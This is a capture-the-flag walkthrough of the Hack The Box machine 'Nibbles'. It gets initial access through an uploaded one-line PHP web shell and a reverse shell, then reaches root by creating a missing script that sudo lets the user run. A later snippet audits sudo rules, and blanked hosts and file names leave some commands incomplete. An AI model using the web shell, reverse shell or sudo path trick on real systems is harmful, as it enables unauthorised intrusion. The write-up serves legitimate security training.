HTB: Nibbles


This machine is Nibbles from Hack The Box.


A service discovery scan to start

root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-07-13 06:16 EDT
Nmap scan report for
Host is up (0.042s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds

Checking port 80

Screenshot 1

In the source

Screenshot 2

Off to

Screenshot 3

Fired up dirbuster

Screenshot 4

Screenshot 5

And off to admin.php

Screenshot 6

I tested a few potential creds and got lucky with


Screenshot 7

Some googling revealed an arbitrary file upload bug, so I made a quick php shell called shell.php

<?php system($_GET['cmd']); ?>

Went to

Screenshot 8

And uploaded my shell; it came up with some warnings

Screenshot 9

I found it would be uploaded to, so I tested it with

Screenshot 10

And set up for a reverse shell

root@kali:~# nc -nlvp 1234

But none of my reverse shells worked, so I took a php reverse shell file from /usr/share/webshells/, pointed it at me and renamed it .txt before copying it into /var/www/html

root@kali:~# apache2ctl start

Then used my webshell to set it up php-reverse-shell.txt php-reverse-shell.php

Before triggering it by going to
connect to [] from (UNKNOWN) [] 54926
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:43:48 up 34 min,  0 users,  load average: 0.30, 0.09, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off

There we go, upgrade the shell

$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found


$ python3 -c "import pty;pty.spawn('/bin/bash')"


nibbler@Nibbles:/$ cd ~
nibbler@Nibbles:/home/nibbler$ ls -la
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017
-r-------- 1 nibbler nibbler   33 Dec 10  2017 user.txt

nibbler@Nibbles:/home/nibbler$ cat user.txt

Root Time

I looked for a priv esc route

nibbler@Nibbles:/home/nibbler$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/

Now I know that directory doesn't exist, but the directory it is meant to be in is writable, so I can add it, make the script, then run it as root

nibbler@Nibbles:/home/nibbler$ mkdir personal
nibbler@Nibbles:/home/nibbler$ cd personal
nibbler@Nibbles:/home/nibbler/personal$ mkdir stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "/bin/sh" >
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/

There's the shell

# id
uid=0(root) gid=0(root) groups=0(root)
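
The escalation above works because the sudoers rule points at a path under a directory the unprivileged user controls. As an added example (not part of the original write-up), here is a Python check an administrator could run over `sudo -l` output to flag such rules; the function names and the PLACEHOLDER.sh file name are assumptions, since the page does not show the script name.

```python
import os
import re
import stat

# Rule lines of `sudo -l`, e.g. "    (root) NOPASSWD: /path/to/cmd, /other/cmd"
RULE = re.compile(r"^\s*\([^)]+\)\s+(?:[A-Z_]+:\s*)*(?P<cmds>/.*)$")


def sudo_commands(sudo_l_output):
    """Return the absolute command paths listed in `sudo -l` output."""
    paths = []
    for line in sudo_l_output.splitlines():
        match = RULE.match(line)
        if not match:
            continue
        for cmd in match.group("cmds").split(","):
            path = next((t for t in cmd.split() if t.startswith("/")), None)
            if path:
                paths.append(path)
    return paths


def audit_path(command_path, trusted_uids=frozenset({0})):
    """Walk from the command up to /, returning (path, reason) findings."""
    findings = []
    path = os.path.abspath(command_path)
    while True:
        try:
            st = os.lstat(path)
        except (FileNotFoundError, NotADirectoryError):
            # Whoever can write to the nearest existing parent can create this.
            findings.append((path, "missing"))
        else:
            if st.st_uid not in trusted_uids:
                findings.append((path, "owner-not-trusted"))
            writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            if writable and not stat.S_ISLNK(st.st_mode):
                findings.append((path, "group-or-world-writable"))
        if path == os.path.dirname(path):
            return findings
        path = os.path.dirname(path)


if __name__ == "__main__":
    # Constructed sample; PLACEHOLDER.sh stands in for the script name.
    sample = "    (root) NOPASSWD: /home/nibbler/personal/stuff/PLACEHOLDER.sh\n"
    for cmd in sudo_commands(sample):
        for where, why in audit_path(cmd):
            print(f"{cmd}: {where}: {why}")
```

Any finding on the command or a parent directory means someone other than root can decide what the rule executes; run the check as root so every path component is readable.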

# cd /root
# ls -la
drwx------  4 root root 4096 Dec 29  2017 .
drwxr-xr-x 23 root root 4096 Dec 28  2017 ..
-rw-------  1 root root    0 Dec 29  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Dec 10  2017 .cache
drwxr-xr-x  2 root root 4096 Dec 10  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Dec 10  2017 root.txt

# cat root.txt
